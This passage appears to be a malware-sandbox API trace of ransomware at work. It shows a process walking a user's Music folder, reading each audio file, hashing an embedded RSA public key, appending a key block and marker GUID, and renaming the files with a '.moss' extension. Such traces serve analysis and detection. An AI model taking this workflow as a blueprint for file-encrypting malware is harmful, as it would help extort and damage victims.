(HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b499b0 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f140 [0170.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.041] GetCurrentThreadId () returned 0x324 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0170.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0170.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc188 [0170.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0170.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0170.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0170.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0170.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc1a0 [0170.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0170.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.043] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xfcf9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.043] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.043] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.043] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.043] CloseHandle (hObject=0x664) returned 1 [0170.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b4b098 [0170.045] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Kz0qvM tTpZbsG5.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kz0qvm ttpzbsg5.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Kz0qvM tTpZbsG5.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kz0qvm ttpzbsg5.m4a.moss")) returned 1 [0170.047] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd480f3a0, ftCreationTime.dwHighDateTime=0x1d5dff5, ftLastAccessTime.dwLowDateTime=0xc6bc6380, ftLastAccessTime.dwHighDateTime=0x1d5e707, ftLastWriteTime.dwLowDateTime=0xc6bc6380, ftLastWriteTime.dwHighDateTime=0x1d5e707, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lf_1AfflQryz8itj s8w", cAlternateFileName="LF_1AF~1")) returned 1 [0170.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f140 [0170.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f1c8 [0170.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0170.047] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc64fd80, ftCreationTime.dwHighDateTime=0x1d5de29, ftLastAccessTime.dwLowDateTime=0x10c570a0, ftLastAccessTime.dwHighDateTime=0x1d5e0f2, ftLastWriteTime.dwLowDateTime=0x10c570a0, ftLastWriteTime.dwHighDateTime=0x1d5e0f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LV2X09A0oM561", cAlternateFileName="LV2X09~1")) returned 1 [0170.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0170.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x310) returned 0x3b447b0 [0170.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0170.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0170.047] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b411e8 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2a98 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41590 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2930 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f29a8 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x3b4cd28 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x3b4cda0 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f140 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x3b4ce18 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b415f8 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f1c8 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x3b4ce90 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x3b4cf08 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x3b4cf80 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x3b4cff8 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x3b4d070 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ee98 [0170.048] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b74d2e0, ftCreationTime.dwHighDateTime=0x1d5e6c9, ftLastAccessTime.dwLowDateTime=0x46898190, ftLastAccessTime.dwHighDateTime=0x1d5dbe8, ftLastWriteTime.dwLowDateTime=0x46898190, ftLastWriteTime.dwHighDateTime=0x1d5dbe8, nFileSizeHigh=0x0, nFileSizeLow=0x7548, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oKSKm4Gv-RfTedCWj.wav", cAlternateFileName="OKSKM4~1.WAV")) returned 1 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0170.048] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0170.048] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\oKSKm4Gv-RfTedCWj.wav") returned=".wav" [0170.048] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\oKSKm4Gv-RfTedCWj.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\okskm4gv-rftedcwj.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.049] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=30024) returned 1 [0170.049] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.052] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7522, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.052] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.053] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.053] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x7548, lpOverlapped=0x0) returned 1 [0170.054] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.054] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.054] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.054] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.054] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0170.055] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.055] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.055] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.055] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.055] GetLastError () returned 0x0 [0170.055] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.055] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0170.055] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.055] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.055] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.055] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.056] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.056] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.056] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7548, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.056] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.056] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.056] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.057] CloseHandle (hObject=0x664) returned 1 [0170.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0170.059] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b4b098 [0170.059] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\oKSKm4Gv-RfTedCWj.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\okskm4gv-rftedcwj.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\oKSKm4Gv-RfTedCWj.wav.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\okskm4gv-rftedcwj.wav.moss")) returned 1 [0170.061] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e6320, ftCreationTime.dwHighDateTime=0x1d5e523, ftLastAccessTime.dwLowDateTime=0x54dba590, ftLastAccessTime.dwHighDateTime=0x1d5db82, ftLastWriteTime.dwLowDateTime=0x54dba590, ftLastWriteTime.dwHighDateTime=0x1d5db82, nFileSizeHigh=0x0, nFileSizeLow=0x3fea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yRwbkAy.m4a", cAlternateFileName="")) returned 1 [0170.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0170.061] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0170.061] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\yRwbkAy.m4a") returned=".m4a" [0170.061] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\yRwbkAy.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yrwbkay.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.061] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=16362) returned 1 [0170.062] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.065] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3fc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.065] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.066] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x3fea, lpOverlapped=0x0) returned 1 [0170.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.066] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2dd98) returned 1 [0170.067] CryptCreateHash (in: hProv=0xd2dd98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.067] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.068] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.068] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.068] GetLastError () returned 0x0 [0170.068] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.068] CryptReleaseContext (hProv=0xd2dd98, dwFlags=0x0) returned 1 [0170.068] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.068] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.068] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.068] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.069] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3fea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.069] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.069] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0170.069] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0170.069] CloseHandle (hObject=0x664) returned 1 [0170.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41730 [0170.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0170.074] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\yRwbkAy.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yrwbkay.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\yRwbkAy.m4a.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yrwbkay.m4a.moss")) returned 1 [0170.076] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8c930, ftCreationTime.dwHighDateTime=0x1d5e557, ftLastAccessTime.dwLowDateTime=0xc8f76b70, ftLastAccessTime.dwHighDateTime=0x1d5e0dd, ftLastWriteTime.dwLowDateTime=0xc8f76b70, ftLastWriteTime.dwHighDateTime=0x1d5e0dd, nFileSizeHigh=0x0, nFileSizeLow=0x7168, dwReserved0=0xa0000003, dwReserved1=0x0, 